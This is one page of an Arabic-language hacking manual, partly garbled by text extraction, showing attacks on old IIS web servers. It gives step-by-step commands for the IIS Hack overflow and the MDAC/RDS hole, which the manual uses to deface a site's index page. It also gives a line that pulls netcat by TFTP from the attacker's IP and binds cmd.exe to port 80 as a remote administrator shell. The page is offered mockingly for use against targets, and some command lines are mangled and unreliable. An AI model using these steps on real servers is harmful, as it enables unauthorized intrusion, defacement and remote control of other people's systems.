Page 144 - بسم الله الرحمن الرحيم
        P. 144
     - : IIS Hack.exe
                                                                                        ----------------
اكتشف ختبراء المن في شركة  eEyeثغرة امنية تصسمح لك بتحميل نسخه ذكية من  nc.exeوجهعلها تصنصت
                                                                                       على المنفذ .. 80
                              وهذا سيعطيك سطر اوامر  cmde.exeمع امتيازات . Administrator
    بامكانك انزال  NC.exeو  IIS Hack.exeمن الموقع . /http://www.technotronic.com
                                                   ويجب تصشغيل ويب سيرفر في جههازك قبل تصنفيذ الثغرة ..
    قم بنسخ اداة  nc.exeوضعها في الدليل الرئيسي للويب سيرفر لديك )في اباتصشي  (Htdocsوفي IIS
                                                                                    الدليل . wwwroot
                                                                        ثم قم بتشغيل : IISHack.exe
                     c:\>iishack.exe http://www.target.com/ 80 your_IP/ncx.exe
                                                                       وبعد اتصما.م الخطوة السابقة بنجا ح :
                                /c:\>nc http://www.target.comوستجد امامك eGG SheLL
                       ملحظة  :تصعمل هذه الثغرة على سيرفرات  IIS4.0فقط ))اذا لم يتم تصركيب الرقعه(( .
    do you want me to explain what to do next, hey common you must be
                                                                                              kidding
                                                                                           ....hehe...
                                                                                       -----------------
                                                                                   -: MDAC = RDS
                                                                                       -----------------
                         اعتقد انها ثغرة قديمة قليل )لكني ما زلت ارى ان  %40من المواقع تصعاني منها ..
 تصسمح لك هذه الثغرة بتشغيل اوامرك على النظا.م الهدف بشكل محلي  ..سيتم تصشغيل وامرك بصفتك مستخد.م
  SYSTEMاي بصلحيات مدير النظا.م  ..على العمو.م اذا اردت معرفة اذا ما كان النظا.م مصابا بهذه الثغرة
                                                                                                  ا.م ل ..
 قم اول بالتصصال بالنظا.م الهدف  c:\>nc -nw -w 2 http://www.host.com/ 80 :ثم قم بارسال
                                                      المر GET /msadc/msadcs.dll HTTP :
           فإذا كان الرد  application/x_varg :فهذا يعني ان النظا.م مصاب )) اذا لم يتم تصرقيعه (( ..
             بامكانك ايجاد سكربتات بيرل تصسهل عليك العمل في هذا الموقع www.wiretrip.net/rfp :
                                                                   (( mdac.pl - msadc2.pl )) v
                                                                     c:\> mdac.pl -h host.com
   Please type the NT commandline you want to run (cmd /c assumed):\n
                                                                                               cmd /c
         إذا اردت تصغيير الصفحه الرئيسية ما عليك ال تصنفيذ المر echo hacked by me hehe > :
                                                            C:\inetpub\wwwroot\index.htm
         وإذا أردنا احكا.م السيطرة على الموقع بامكاننا تصحميل  Hacker's Swiss knife Armyاقصد
                                                                            Nc.exeبواسطة هذا المر :
        systemroot%&&tftp -i YourIP GET nc.exe&&del ftptmp&& attrib -r%
                                                   nc.exe&&nc.exe -l -p 80 -t -e cmd.exe
                                        )) قم بقراءة المر من اليسار الى اليمين لتتمكن من قراءتصه جهيدا ((
    بعدها قم بالتصصال بالنظا.م الهدف على المنفذ  80وستجد سطر اوامر مع امتيازات . Administrator
                                                                  --------------------------------------
                                                        -: Codebrws.asp & Showcode.asp
                                                                  --------------------------------------
الملفان عبارة عن قاريء ملفات  ASPيأتصي مع  IISولكنه ل يأتصي محمل افتراضيا بل يجب على مدير النظا.م
                                                  144
     	
